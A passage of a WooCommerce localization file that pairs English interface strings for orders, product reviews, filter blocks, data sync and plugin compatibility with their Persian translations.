for the JSON partial matching is not supported. Must be either integer, boolean, double or string. %s type provided.'=>'نوع مقدار برای تطبیق جزئی JSON پشتیبانی نمی‌شود. باید عدد صحیح، بولی، دابل یا رشته باشد. نوع %s ارائه شده است.','Scheduled action for %1$s will not be executed as no callbacks are registered.'=>'اقدام زمان‌بندی‌شده برای %1$s اجرا نخواهد شد زیرا هیچ فراخوانی برگشتی ثبت نشده است.','Description of the marketing campaign type.'=>'شرح نوع کمپین بازاریابی.','Name of the marketing campaign type.'=>'نام نوع کمپین بازاریابی.','Cost of the marketing campaign.'=>'هزینه کمپین بازاریابی.','URL to the campaign management page.'=>'نشانی اینترنتی صفحه مدیریت کمپین.','Unknown partial args matching value.'=>'آرگومان‌های جزئی ناشناخته با مقدار تطبیق داده شده.','URL to an image/icon for the campaign type.'=>'نشانی اینترنتی تصویر/نماد برای نوع کمپین.','JSON partial matching not supported in your environment. Please check your MySQL/MariaDB version.'=>'تطبیق جزئی JSON در محیط شما پشتیبانی نمی‌شود. لطفا نسخه MySQL/MariaDB خود را بررسی کنید.','Action Scheduler: %1$d past-due action found; something may be wrong. Read documentation »'=>'زمانبند اقدام: %1$d اقدامات معوقه پیدا شد؛ ممکن است مشکلی وجود داشته باشد. مستندات را بخوانید »','shipping packagesShipment %d'=>'مرسوله %d','shipping country prefixto'=>'به','shipping country prefixto the'=>'به این','block titleActive Filters Controls'=>'فعال کردن فیلتر','Summarize this product in 1-2 short sentences. We\'ll show it at the top of the page.'=>'این محصول را در ۱ تا ۲ جمله کوتاه خلاصه کنید. ما آن را در بالای برگه نشان خواهیم داد.','Manage individual product combinations created from options.'=>'ترکیبات محصول جداگانۀ ایجاد شده از گزینه‌ها را مدیریت کنید.','Thanks for your order. It’s on-hold until we confirm that payment has been received.'=>'با تشکر از سفارش شما. تا زمانی که تایید کنیم که پرداخت دریافت شده است، در حالت انتظار است.','%1$s was called but no order types were registered: it may have been called too early.'=>'%1$s فراخوانی شد اما هیچ نوع سفارشی ثبت نشد: ممکن است خیلی زود فراخوانی شده باشد.','Unable to load the post record for order %1$d'=>'بارگیری رکورد نوشته برای سفارش %1$d ممکن نیست','Template nameProducts by Attribute'=>'محصولات بر اساس ویژگی','The product import process meets my needs.'=>'فرآیند درون‌ریزی محصول، نیازهای من را برآورده می‌کند.','The product import process is easy to complete.'=>'فرآیند درون‌ریزی محصول به راحتی تکمیل می‌شود.','The product update process meets my needs.'=>'فرآیند به روز رسانی محصول نیازهای من را برآورده می‌کند.','The product update process is easy to complete.'=>'فرآیند به روز رسانی محصول به راحتی تکمیل می‌شود.','The search feature in WooCommerce is easy to use.'=>'استفاده از قابلیت جستجو در ووکامرس آسان است.','Invalid order type: %s.'=>'نوع سفارش نامعتبر است: %s.','Product attributes are easy to use.'=>'استفاده از ویژگی‌های محصول آسان است.','The settings screen is easy to use.'=>'استفاده از صفحه تنظیمات آسان است.','The order details screen is easy to use.'=>'استفاده از صفحه جزئیات سفارش آسان است.','The product creation screen is easy to use.'=>'استفاده از صفحه ایجاد محصول آسان است.','The product category details screen is easy to use.'=>'استفاده از صفحه جزئیات دسته محصول آسان است.','The product tag details screen is easy to use.'=>'استفاده از صفحه جزئیات برچسب محصول آسان است.','The search\'s functionality meets my needs.'=>'عملکرد جستجو نیازهای من را برآورده می‌کند.','Displays products filtered by an attribute.'=>'نمایش محصولات فیلتر شده بر اساس یک ویژگی.','The settings screen\'s functionality meets my needs.'=>'عملکرد صفحه تنظیمات نیازهای من را برآورده می‌کند.','Product attributes\' functionality meets my needs.'=>'عملکرد ویژگی‌های محصول نیازهای من را برآورده می‌کند.','The product tag details screen\'s functionality meets my needs.'=>'عملکرد صفحه جزئیات برچسب محصول نیازهای من را برآورده می‌کند.','The product category details screen\'s functionality meets my needs.'=>'عملکرد صفحه جزئیات دسته محصول نیازهای من را برآورده می‌کند.','The product creation screen\'s functionality meets my needs.'=>'عملکرد صفحه ایجاد محصول نیازهای من را برآورده می‌کند.','This will delete the custom orders tables. To create them again enable the "High-Performance order storage" feature (via Settings > Advanced > Features).'=>'با این کار جداول سفارشات سفارشی حذف می شود. برای ایجاد مجدد آنها، ویژگی «ذخیره‌سازی سفارش با عملکرد بالا» را فعال کنید (از طریق تنظیمات > پیشرفته > ویژگی‌ها).','This will delete the custom orders tables. The tables can be deleted only if the "High-Performance order storage" is not authoritative and sync is disabled (via Settings > Advanced > Features).'=>'با این کار جداول سفارشات سفارشی حذف می شود. جداول را می توان تنها در صورتی حذف کرد که "ذخیره سازی سفارش با کارایی بالا" معتبر نباشد و همگام سازی غیرفعال باشد (از طریق تنظیمات > پیشرفته > ویژگی ها).','Get your products in front of Pinners searching for ideas and things to buy.'=>'محصولات خود را در مقابل Pinners در جستجوی ایده ها و چیزهایی برای خرید قرار دهید.','Attempted to determine the edit URL for order %d, however the order does not exist.'=>'تلاش برای تعیین URL ویرایش برای سفارش %d، اما ترتیب وجود ندارد.','Order type mismatch.'=>'عدم تطابق نوع سفارش.','The order details screen\'s functionality meets my needs.'=>'عملکرد صفحه جزئیات سفارش نیازهای من را برآورده می‌کند.','Product published. %1$sView Product%2$s'=>'محصول منتشر شد. %1$sمشاهده محصول%2$s','For best results, upload JPEG or PNG files that are 1000 by 1000 pixels or larger. Maximum upload file size: %1$s.'=>'برای بهترین نتیجه، فایل‌های JPEG یا PNG را با ابعاد 1000 در 1000 پیکسل یا بزرگتر آپلود کنید. حداکثر اندازه فایل آپلود: %1$s.','Product updated. %1$sView Product%2$s'=>'محصول بروز رسانی شد. %1$sمشاهده محصول%2$s','Chernihivshchyna'=>'Chernihivshchyna','Cherkashchyna'=>'Cherkashchyna','Khmelnychchyna'=>'Khmelnychchyna','Khersonshchyna'=>'Khersonshchyna','Kharkivshchyna'=>'Kharkivshchyna','Ternopilshchyna'=>'Ternopilshchyna','Sumshchyna'=>'Sumshchyna','Rivnenshchyna'=>'Rivnenshchyna','Poltavshchyna'=>'Poltavshchyna','Odeshchyna'=>'Odeshchyna','Mykolayivschyna'=>'Mykolayivschyna','Lvivshchyna'=>'Lvivshchyna','Crimea'=>'Crimea','Sevastopol'=>'Sevastopol','Kirovohradschyna'=>'Kirovohradschyna','Kyivshchyna'=>'Kyivshchyna','Kyiv'=>'Kyiv','Prykarpattia'=>'Prykarpattia','Zaporizhzhya'=>'Zaporizhzhya','Zakarpattia'=>'Zakarpattia','Zhytomyrshchyna'=>'Zhytomyrshchyna','Donechchyna'=>'Donechchyna','Dnipropetrovshchyna'=>'Dnipropetrovshchyna','Luhanshchyna'=>'Luhanshchyna','Volyn'=>'Volyn','Vinnychchyna'=>'Vinnychchyna','block titleFilter by Rating Controls'=>'فیلتر بر اساس کنترل‌های رتبه‌بندی','Product Filters'=>'فیلترهای محصول','Summary'=>'خلاصه','Restrictions'=>'محدودیت‌ها','When out of stock'=>'هنگامی که موجود نیست','Allow purchases'=>'اجازه خرید دهید','Don\'t allow purchases'=>'اجازه خرید ندهید','Allow purchases, but notify customers'=>'اجازه خرید دهید، اما به مشتریان اطلاع دهید','Search or create categories…'=>'جستجو یا ایجاد دسته‌ها…','Add price'=>'افزودن قیمت','Ziguinchor'=>'Ziguinchor','Thiès'=>'Thiès','Tambacounda'=>'Tambacounda','Saint-Louis'=>'Saint-Louis','Sédhiou'=>'Sédhiou','Matam'=>'Matam','Louga'=>'Louga','Kaolack'=>'Kaolack','Kédougou'=>'Kédougou','Kolda'=>'Kolda','Kaffrine'=>'Kaffrine','Fatick'=>'Fatick','Dakar'=>'Dakar','Diourbel'=>'Diourbel','Draft'=>'پیش‌نویس','Learn more here'=>'اینجا بیشتر بیاموزید','Add prices'=>'افزودن قیمت‌ها','We recently asked you if you wanted more information about %s. Run your business and manage your payments in one place with the solution built and supported by WooCommerce.'=>'اخیرا از شما پرسیدیم که آیا اطلاعات بیشتری در مورد %s می‌خواهید. با راه حل ساخته شده و پشتیبانی شده توسط ووکامرس، کسب و کار خود را اجرا کنید و پرداخت‌های خود را در یک مکان مدیریت کنید.','Is data sync enabled for HPOS?'=>'آیا همگام سازی داده ها برای HPOS فعال است؟','HPOS data sync enabled:'=>'همگام سازی داده های HPOS فعال شد:','Add price to all variations that don\'t have a price'=>'قیمت را به همه تنوع‌هایی که قیمت ندارند اضافه کنید','List of attributes (taxonomy terms) assigned to the product. For variable products, these are mapped to variations (see the `variations` field).'=>'فهرست ویژگی‌های (موارد طبقه‌بندی) اختصاص داده شده به محصول. برای محصولات متغیر، اینها به تنوع‌ها نگاشت شدند (به قسمت `تنوع‌ها` مراجعه کنید).','Order datastore:'=>'مخزن داده سفارش:','Datastore currently in use for orders.'=>'مخزن داده در حال حاضر برای سفارش‌ها استفاده می‌شود.','You may be interested in…'=>'ممکن است علاقه‌مند باشید به …','Replace'=>'جایگزینی','block descriptionEnable customers to filter the product grid by rating.'=>'مشتریان را قادر می‌سازد تا جدول محصول را بر اساس رتبه‌بندی فیلتر کنند.','block descriptionShows the Cross-Sells products.'=>'محصولات Cross-Sells را نشان می دهد.','block titleCart Cross-Sells Products'=>'سبد خرید متقابل محصولات','block descriptionShows the Cross-Sells block.'=>'بلوک Cross-Sells را نشان می دهد.','block titleCart Cross-Sells'=>'سبد خرید متقابل','block titleFilter by Stock Controls'=>'فیلتر بر اساس کنترل موجودی','block titleFilter by Price Controls'=>'فیلتر بر اساس کنترل قیمت','block titleFilter by Attribute Controls'=>'فیلتر بر اساس کنترل‌های ویژگی','Product quantity'=>'تعداد محصول','Incompatible with \'%s\''=>'ناسازگار با \'%s\'','Manage WooCommerce features'=>'مدیریت امکانات ووکامرس','⚠ This plugin is incompatible with the enabled WooCommerce features \'%1$s\', \'%2$s\' and %3$d more, it shouldn\'t be activated.'=>'⚠ این افزونه با ویژگی‌های WooCommerce فعال «%1$s»، «%2$s» و %3$d دیگر سازگار نیست، نباید فعال شود.','Incompatible with WooCommerce features'=>'با ویژگی‌های ووکامرس ناسازگار است','⚠ This plugin is incompatible with the enabled WooCommerce features \'%1$s\' and \'%2$s\', it shouldn\'t be activated.'=>'⚠ این افزونه با ویژگی‌های فعال ووکامرس \'%1$s\' و \'%2$s\' ناسازگار است، نباید فعال شود.','View all plugins - Manage WooCommerce features'=>'مشاهده همه افزونه‌ها - مدیریت ویژگی‌های ووکامرس','You are viewing the active plugins that are incompatible with the \'%s\' feature.'=>'شما در حال مشاهده افزونه‌های فعالی هستید که با ویژگی \'%s\' ناسازگار هستند.','You are viewing active plugins that are incompatible with currently enabled WooCommerce features.'=>'شما در حال مشاهده افزونه‌های فعالی هستید که با ویژگی‌های ووکامرس فعال‌شده ناسازگار هستند.','WooCommerce has detected that some of your active plugins are incompatible with currently enabled WooCommerce features. Please review the details.'=>'ووکامرس تشخیص داده است که برخی از افزونه‌های فعال شما با ویژگی‌هایی از ووکامرس که در حال حاضر فعال هستند ناسازگار هستند. لطفا جزئیات را مرور کنید.','⚠ This plugin is incompatible with the enabled WooCommerce feature \'%s\', it shouldn\'t be activated.'=>'⚠ این افزونه با ویژگی فعال ووکامرس \'%s\' ناسازگار است، نباید فعال شود.','Experimental features'=>'امکانات آزمایشی','These features are either experimental or incomplete, enable them at your own risk!'=>'این ویژگی‌ها آزمایشی یا ناقص هستند، آنها را با مسئولیت خودتان فعال کنید!','WooCommerce Admin has been disabled'=>'مدیر ووکامرس غیرفعال شده','Missing table info for query arg.'=>'اطلاعات جدول مربوط به آرگومان پرس‌وجو موجود نیست.','%1$s should be called inside the %2$s action.'=>'%1$s باید درون عمل %2$s فراخوانی شود.','Sync completed.'=>'همگام‌سازی تکمیل شد.','No orders were synced.'=>'هیچ سفارشی همگام‌سازی نشد.','Migrate command is deprecated. Please use `sync` instead.'=>'دستور انتقال منسوخ شده است. لطفا به جای آن از «همگام‌سازی» استفاده کنید.','Create ad campaigns and reach one billion global users with %1$sTikTok for WooCommerce%2$s'=>'%1$sTikTok for WooCommerce%2$s کمپین‌های تبلیغاتی ایجاد کنید و به یک میلیارد کاربر جهانی دسترسی پیدا کنید','block titleFilter Block'=>'بلوک فیلتر','block descriptionHighlight a product or variation.'=>'یک محصول یا متغیر را برجسته کنید.','block descriptionEnable customers to filter the product grid by stock status.'=>'مشتریان را قادر می‌سازد تا شبکه محصول را بر اساس وضعیت موجودی فیلتر کنند.','block descriptionEnable customers to filter the product grid by choosing a price range.'=>'مشتریان را قادر می‌سازد تا با انتخاب محدوده قیمت، شبکه محصول را فیلتر کنند.','block descriptionContains blocks that display the content of the Mini-Cart.'=>'حاوی بلوک‌هایی است که محتوای سبد خرید کوچک را نشان می‌دهد.','block descriptionEnable customers to filter the product grid by selecting one or more attributes, such as color.'=>'مشتریان را قادر می‌سازد تا با انتخاب یک یا چند ویژگی، مانند رنگ، شبکه محصول را فیلتر کنند.','block descriptionDisplay the currently active filters.'=>'نمایش فیلتر‌های درحال‌حاضر فعال.','Select %s'=>'انتخاب %s','Process your orders on the go. %1$sGet the app%2$s.'=>'سفارشات خود را در حال حرکت پردازش کنید. %1$sبرنامه%2$s را دریافت کنید.','%1$sManage the order%2$s with the app.'=>'%1$sسفارش%2$s را با برنامه مدیریت کنید.','Jetpack is not connected.'=>'چت‌پک متصل نشده است.','Get the free WooCommerce mobile app'=>'اپلیکیشن موبایل ووکامرس را رایگان دریافت کنید','The previous status of order %1$d ("%2$s") is invalid. It could not be restored.'=>'وضعیت قبلی سفارش %1$d ("%2$s") نامعتبر است. قابل بازیابی نبود.','The previous status of order %1$d ("%2$s") is invalid. It has been restored to "pending" status instead.'=>'وضعیت قبلی سفارش %1$d ("%2$s") نامعتبر است. در عوض به وضعیت "در انتظار" بازیابی شد.','Order %1$d cannot be restored from the trash: it has already been restored to status "%2$s".'=>'سفارش %1$d از زباله‌دان قابل بازیابی نیست: به وضعیت "%2$s" بازیابی شد.','Something went wrong when trying to restore order %d from the trash. It could not be restored.'=>'هنگام تلاش برای بازیابی سفارش %d از زباله‌دان، مشکلی پیش آمد. قابل بازیابی نبود.','%1$sCollect payments easily%2$s from your customers anywhere with our mobile app.'=>'با اپلیکیشن تلفن همراه ما در هر جایی، از مشتریان خود %1$sپرداخت‌ها را به راحتی جمع‌آوری کنید%2$s.','Registers whether the note is read or not'=>'ثبت می‌کند که آیا یادداشت خوانده شده است یا خیر','Whether or not this store country is set via onboarding profiler.'=>'اینکه آیا کشور این فروشگاه از طریق پروفایلر ورود به سیستم تنظیم شده است یا خیر.','Connection password:'=>'رمز عبور اتصال:','Your store is already connected.'=>'فروشگاه شما از قبل متصل است.','Open in browser'=>'در مرورگر باز کنید','Invalid password. Generate a new one from %s.'=>'رمز عبور نامعتبر. یکی جدید در %s ایجاد کنید.','If you don\'t have an application password (not your account password), generate a password from %s'=>'اگر اپلیکیشن رمز عبور ندارید (نه رمز عبور حساب خود)، یک رمز عبور در %s ایجاد کنید','Summarize this product in 1-2 short sentences. We’ll show it at the top of the page.'=>'این محصول را در ۱ تا ۲ جمله کوتاه خلاصه کنید. ما آن را در بالای صفحه نشان خواهیم داد.','Open downloadable files in the browser, instead of saving them to the device.'=>'فایل‌های قابل دانلود را به جای ذخیره در دستگاه، در مرورگر باز کنید.','Empty Mini-Cart Message'=>'پیام سبد خرید کوچک خالی','Your store is not connected to WooCommerce.com. Run `wp wc com connect` command.'=>'فروشگاه شما به WooCommerce.com متصل نیست. دستور `wp wc com connect` را اجرا کنید.','Ensure meta_data excludes specific keys.'=>'اطمینان حاصل کنید که meta_data کلیدهای خاصی را حذف نمی‌کند.','Are you sure you want to disconnect your store from WooCommerce.com?'=>'آیا مطمئنید که می‌خواهید ارتباط فروشگاه خود را با WooCommerce.com قطع کنید؟','Unsupported argument type provided as value.'=>'نوع آرگومان پشتیبانی نشده به عنوان مقدار ارائه شده است.','Limit meta_data to specific keys.'=>'محدود کردن meta_data را به کلیدهای خاص کنید.','Customers can still save the file to their device, but by default file will be opened instead of being downloaded (does not work with redirects).'=>'مشتریان همچنان می‌توانند فایل را در دستگاه خود ذخیره کنند، اما به طور پیشفرض، فایل به جای دانلود، باز می‌شود (با تغییر مسیرها کار نمی‌کند).','Product types define available product details and attributes, such as downloadable files and variations. They’re also used for analytics and inventory management.'=>'انواع محصول جزئیات و ویژگی های محصول موجود را تعریف می کنند، مانند فایل ها و تغییرات قابل دانلود. آنها همچنین برای تجزیه و تحلیل و مدیریت موجودی استفاده می شوند.','Describe this product. What makes it unique? What are its most important features?'=>'این محصول را توضیح دهید. چه چیزی آن را منحصر به فرد می کند؟ مهم ترین ویژگی های آن چیست؟','Variable – a product with variations, each of which may have a different SKU, price, stock option, etc. For example, a t-shirt available in different colors and/or sizes.'=>'تنوع - محصولی با تنوع، که هر یک ممکن است شناسه، قیمت، گزینه موجودی و غیره متفاوتی داشته باشد. به عنوان مثال، یک تی‌شرت موجود در رنگ‌ها و/یا اندازه‌های مختلف.','Grouped – a collection of related products that can be purchased individually and only consist of simple products. For example, a set of six drinking glasses.'=>'گروه‌بندی‌شده – مجموعه‌ای از محصولات مرتبط که می‌توان آنها را به‌صورت جداگانه خریداری کرد و فقط از محصولات ساده تشکیل شده است. به عنوان مثال، مجموعه ای از شش لیوان نوشیدنی.','External or Affiliate – one that you list and describe on your website but is sold elsewhere.'=>'خارجی یا افیلیت - موردی که در وب‌سایت خود فهرست و توصیف می‌کنید اما در جای دیگری فروخته می‌شود.','Simple – covers the vast majority of any products you may sell. Simple products are shipped and have no options. For example, a book.'=>'ساده - اکثر محصولاتی را که ممکن است بفروشید پوشش می دهد. محصولات ساده ارسال می شوند و هیچ گزینه ای ندارند. مثلا یک کتاب.','Sofia District'=>'مناطق صوفیه','block titleBest Selling Products'=>'پرفروش‌ترین محصولات','block titleAll Products'=>'همه محصولات','block titleProducts by Category'=>'محصولات بر اساس دسته‌بندی','block titleProduct Categories List'=>'لیست دسته‌های محصول','block descriptionDisplay products from your store in a grid layout.'=>'محصولات فروشگاه خود را به صورت شبکه ای نمایش دهید.','block descriptionDisplay a grid of products from your selected categories.'=>'شبکه ای از محصولات را از دسته های انتخابی خود نمایش دهید.','block descriptionShow all product categories as a list or dropdown.'=>'همه دسته بندی های محصول را به صورت لیست یا کشویی نمایش دهید.','block descriptionDisplay a grid of your all-time best selling products.'=>'شبکه ای از پرفروش ترین محصولات تاریخ خود را نمایش دهید.','Postcode / ZIP:'=>'کد پستی:','City:'=>'شهر:','You cannot edit this item because it is in the Trash. Please restore it and try again.'=>'شما نمی‌توانید این مورد را ویرایش کنید زیرا در زباله‌دان است. لطفا آن را بازیابی کنید و دوباره امتحان کنید.','This info will be displayed on the product page, category pages, social media, and search results.'=>'این اطلاعات در صفحه محصول، صفحات دسته بندی، رسانه های اجتماعی و نتایج جستجو نمایش داده می شود.','Product Details'=>'جزئیات محصول','Country / region'=>'کشور / منطقه','Key'=>'کلید','Add Custom Field'=>'افزودن زمینهٔ سفارشی','Value'=>'مقدار','Add New Custom Field:'=>'افزودن زمینهٔ سفارشی تازه:','https://wordpress.org/support/article/custom-fields/'=>'https://wordpress.org/support/article/custom-fields/','Custom Fields'=>'زمینه‌های سفارشی','Invalid table id: %s.'=>'شناسه جدول نامعتبر است: %s.','Enter new'=>'وارد کردن جدید','%s can not be used as a table alias in OrdersTableQuery'=>'%s را نمی توان به عنوان نام مستعار جدول در OrdersTableQuery استفاده کرد','List products and create ads on Facebook and Instagram.'=>'لیست محصولات و ایجاد تبلیغات در فیس بوک و اینستاگرام.','You attempted to edit an order that does not exist. Perhaps it was deleted?'=>'شما سعی کردید سفارشی را ویرایش کنید که وجود ندارد. شاید حذف شده؟','With WooPayments, you can securely accept major cards, Apple Pay, and payments in over 100 currencies – with no setup costs or monthly fees – and you can now accept in-person payments with the Woo mobile app.'=>'با WooPayments، می‌توانید کارت‌های اصلی، اپل پی و پرداخت‌ها را با بیش از ۱۰۰ ارز - بدون هزینه راه‌اندازی یا کارمزد ماهانه - به‌طور ایمن بپذیرید و اکنون می‌توانید پرداخت‌های حضوری را با برنامه تلفن همراه وو بپذیرید.','Can not re-use table alias "%s" in OrdersTableQuery.'=>'امکان استفاده مجدد از نام مستعار جدول "%s" در OrdersTableQuery وجود ندارد.','Invalid order IDs in call to read_multiple()'=>'شناسه‌های سفارش نامعتبر در فراخوانی read_multiple()','With WooPayments, you can securely accept major cards, Apple Pay, and payments in over 100 currencies. Track cash flow and manage recurring revenue directly from your store’s dashboard - with no setup costs or monthly fees.'=>'با WooPayments، می‌توانید کارت‌های اصلی، اپل پی و پرداخت‌های بیش از ۱۰۰ ارز را به‌طور امن بپذیرید. جریان نقدی را ردیابی کنید و درآمدهای مستمر را مستقیماً از داشبورد فروشگاه خود مدیریت کنید - بدون هزینه راه اندازی یا کارمزد ماهانه.','List products and create ads on Facebook and Instagram with Facebook for WooCommerce'=>'فهرست محصولات و ایجاد تبلیغات در فیس‌بوک و اینستاگرام با Facebook for WooCommerce','Custom fields can be used to add extra metadata to an order that you can %1$suse in your theme%2$s.'=>'فیلدهای سفارشی می‌توانند برای اضافه کردن فراداده‌های اضافی به یک سفارش استفاده شوند که می‌توانید %1$s در قالب %2$s خود از آنها استفاده کنید.','Thumbnail image'=>'تصویر بند انگشتی','You don\'t have permission to create a new order.'=>'شما اجازه ایجاد یک سفارش جدید را ندارید.','You do not have permission to edit this order.'=>'شما اجازه ویرایش این سفارش را ندارید.','Payment method is missing.'=>'روش پرداخت وجود ندارد.','1 term'=>'۱ مورد','Displays a single product.'=>'یک محصول را نمایش می‌دهد.','Order status is missing.'=>'وضعیت سفارش وجود ندارد.','Displays search results for your store.'=>'نتایج جستجو را برای فروشگاه شما نمایش می‌دهد.','Displays products filtered by a tag.'=>'نمایش محصولات فیلتر شده براساس یک برچسب.','Displays products filtered by a category.'=>'نمایش محصولات فیلتر شده بر اساس یک دسته.','Displays your products.'=>'محصولات شما را نمایش می‌دهد.','%s terms'=>'%s مورد','%1$s... (%2$s more)'=>'%1$s... (%2$s بیشتر)','Could not find classname for order ID %d'=>'نام کلاس برای شناسه سفارش %d یافت نشد','Order date, hour, minute and/or second are missing.'=>'تاریخ سفارش، ساعت، دقیقه و/یا ثانیه وجود ندارد.','List of cross-sells items related to cart items.'=>'فهرست اقلام فروش متقابل مرتبط با اقلام سبد خرید.','Could not register pattern "%s" as a block pattern ("Title" field missing)'=>'الگوی "%s" به عنوان الگوی بلوک ثبت نشد (فیلد "عنوان" وجود ندارد)','Could not register pattern "%1$s" as a block pattern (invalid slug "%2$s")'=>'الگوی "%1$s" به عنوان الگوی بلوک ثبت نشد (نام کاربری "%2$s" نامعتبر است)','Could not register pattern "%s" as a block pattern ("Slug" field missing)'=>'الگوی "%s" به عنوان الگوی بلوک ثبت نشد (فیلد "Slug" وجود ندارد)','Return the default payment suggestions when woocommerce_show_marketplace_suggestions and woocommerce_setting_payments_recommendations_hidden options are set to no'=>'وقتی گزینه‌های woocommerce_show_marketplace_suggestions و woocommerce_setting_payments_recommendations_hidden روی خیر تنظیم شده باشند، پیشنهادهای پرداخت پیشفرض را برمی‌گرداند','Template nameProduct Search Results'=>'نتایج جستجوی محصول','Template nameProducts by Tag'=>'محصولات براساس برچسب','Template nameProducts by Category'=>'محصولات بر اساس دسته‌بندی','Template nameProduct Catalog'=>'کاتالوگ محصول','Template nameSingle Product'=>'تک محصول','Wow your shoppers'=>'خریداران خود را تحت تأثیر قرار دهید','Print at home'=>'در خانه چاپ کنید','Discounted rates'=>'نرخ‌های تخفیف‌دار','Order status changed by bulk edit.'=>'وضعیت سفارش با ویرایش گروهی تغییر کرد.','Template nameMini-Cart'=>'سبد خرید کوچک','The %1$s plugin has been deactivated as the latest improvements are now included with the %2$s plugin.'=>'افزونه %1$s غیرفعال شده است زیرا جدیدترین پیشرفت‌ها اکنون در افزونه %2$s گنجانده شده است.','Review shipping options'=>'گزینه‌های حمل و نقل را بررسی کنید','A valid event name must be specified.'=>'یک نام رویداد معتبر باید مشخص شود.','Batch %1$d (%2$d orders) completed in %3$d seconds'=>'دسته %1$d (%2$d سفارش) در %3$d ثانیه تکمیل شد','Buy postage when you need it'=>'در صورت نیاز هزینه پست بخرید','Order date parsed by DateTime::formatM d, Y @ h:i A'=>'M d, Y @ h:i A','Template used to display the Mini-Cart drawer.'=>'الگوی مورد استفاده برای نمایش کشوی سبد خرید کوچک.','Could not create order in posts table.'=>'نمی‌توان سفارش را در جدول نوشته‌ها ایجاد کرد.','Pick up an order, then just pay, print, package and post.'=>'یک سفارش را بردار، بعد فقط پرداخت کن، چاپ کن، بسته‌بندی کن و پستش کن.','A valid prop name must be specified'=>'یک نام معتبر برای prop باید مشخص شود','No need to wonder where that stampbook went.'=>'لازم نیست تعجب کنید که آن دفترچه تمبر کجا رفت.','Could not persist order to database table "%s".'=>'نتوانست ترتیب را در جدول پایگاه داده "%s" حفظ کند.','Choose a default form value if you want a certain variation already selected when a user visits the product page.'=>'اگر می‌خواهید زمانی که کاربر از صفحه محصول بازدید می‌کند، تنوع خاصی از قبل انتخاب شده باشد، یک مقدار فرم پیشفرض را انتخاب کنید.','%s order status changed.'=>'وضعیت %s سفارش تغییر کرد.','Webhook created on date parsed by DateTime::formatM d, Y @ h:i A'=>'M d, Y @ h:i A','Limit purchases to 1 item per order'=>'خریدها را به 1 مورد در هر سفارش محدود کنید','Check to let customers to purchase only 1 item in a single order. This is particularly useful for items that have limited quantity, for example art or handmade goods.'=>'علامت بزنید تا مشتریان بتوانند تنها ۱ مورد را در هر سفارش خریداری کنند. این بیشتر برای اقلامی مفید است که تعداد محدودی دارند، مانند آثار هنری یا کالاهای دست ساز.','block descriptionDisplay a grid of products with selected tags.'=>'نمایش شبکه‌ای از محصولات با برچسب‌های انتخاب شده.','block descriptionDisplay a grid of products with selected attributes.'=>'نمایش شبکه‌ای از محصولات با ویژگی‌های انتخاب شده.','block descriptionDisplay a selection of hand-picked products in a grid.'=>'منتخبی از محصولات دست‌چین‌شده را در یک شبکه نمایش دهید.','block titleProducts by Attribute'=>'محصولات براساس ویژگی','block titleProducts by Tag'=>'محصول براساس برچسب','block keywordHandpicked Products'=>'محصولات دست‌چین شده','block titleHand-picked Products'=>'محصولات دست‌چین شده','All ratings'=>'همه امتیازات','Approve this review'=>'پذیرفتن این دیدگاه','verbTrash'=>'حذف کردن','Delete Permanently'=>'پاک کردن برای همیشه','verbSpam'=>'جفنگ','Unapprove'=>'نپذیرفتن','Unapprove this review'=>'نپذیرفتن این دیدگاه','Search Reviews'=>'جست‌وجوی دیدگاه‌ها','review typeType'=>'نوع','Author'=>'نویسنده','reviewNot spam'=>'هرزنامه نیست','reviewMark as spam'=>'نشانه‌گذاری به عنوان هرزنامه','column nameSubmitted on'=>'ارسال شده در','Reply'=>'پاسخ دادن','In reply to %s.'=>'در پاسخ به %s.','Replies'=>'پاسخ‌ها','All types'=>'همهٔ گونه‌ها','Empty Spam'=>'خالی کردن هرزنامه','g:i a'=>'g:i a','No reviews'=>'بدون نقد و بررسی','No pending reviews'=>'هیچ نقد و بررسی‌ای در انتظار بررسی نیست','No approved reviews'=>'هیچ نقد و بررسی‌ای تأیید نشده است','Select review'=>'انتخاب نقد و بررسی','No reviews found.'=>'نقد و بررسی‌ای یافت نشد.','No reviews awaiting moderation.'=>'نقد و بررسی‌ای برای مدیریت کردن وجود ندارد.','column nameReview'=>'نقد و بررسی','Reply to this review'=>'پاسخ دادن به‌این نقد و بررسی','Restore this review from the spam'=>'بازیابی این نقد و بررسی از جفنگیات','Mark this review as spam'=>'نشانه‌گذاری این نقد و بررسی به عنوان جفنگ','Quick Edit'=>'ویرایش سریع','Edit this review'=>'ویرایش این نقد و بررسی','All dates'=>'همهٔ تاریخ‌ها','Sorry, you must be logged in to reply to a review.'=>'با عرض پوزش، شما باید وارد شوید تا بتوانید به نقد و بررسی پاسخ دهید.','Error: You can\'t reply to a review on a draft product.'=>'خطا: نمی‌توانید به نقد و بررسی محصولی که در پیش‌نویس است پاسخ دهید.','order dates dropdown%1$s %2$d'=>'%1$s %2$d','%1$d out of 5'=>'%1$d از 5','%s-star rating'=>'%s-امتیاز ستاره‌ای','reviewNot Spam'=>'هرزنامه نیست','Quick edit this review inline'=>'ویرایش سریع این بررسی درون خطی','Filter by review rating'=>'فیلتر بر اساس امتیاز نقد و بررسی','Filter by review type'=>'فیلتر بر اساس نوع نقد و بررسی','Error: Please type your reply text.'=>'خطا: لطفا متن نقد و بررسیتان را بنویسید.','Error: Please type your review text.'=>'خطا: لطفا متن نقد و بررسیتان را بنویسید.','%1$d error found: %2$s. Please review the error above.'=>'%1$d خطا پیدا شد: %2$s. لطفا خطای بالا را بررسی کنید.','%s Review in moderation'=>'%s نقد و بررسی در انتظار بررسی','%s approved review'=>'%s نقد و بررسی تأیید شده','%s pending review'=>'%s نقد و بررسی در انتظار بررسی','%s review approved'=>'%s نقد و بررسی پذیرفته شد','%s review marked as spam.'=>'%s نقد و بررسی به عنوان هرزنامه نشانه‌گذاری شد.','%s review moved to the Trash.'=>'%s نقد و بررسی به زباله‌دان منتقل شد.','%s review restored from the Trash'=>'%s نقد و بررسی از زباله‌دان بازیابی شد','%s review restored from the spam'=>'%s نقد و بررسی از هرزنامه بازیابی شد','%s review unapproved'=>'%s نقد و بررسی رد شد','product reviewsAll (%s)'=>'همه (%s)','product reviewsApproved (%s)'=>'تأییدشده (%s)','product reviewsPending (%s)'=>'در انتظار تأیید (%s)','product reviewsSpam (%s)'=>'هرزنامه (%s)','product reviewsTrash (%s)'=>'پاک کردن (%s)','%s review'=>'%s نقد و بررسی','%s Review'=>'%s نقد و بررسی','%s review permanently deleted'=>'%s نقد و بررسی برای همیشه حذف شد','Limit result to items with specified user ids.'=>'نتیجه را به مواردی با شناسه های کاربری مشخص شده محدود کنید.','Force retrieval of fresh data instead of from the 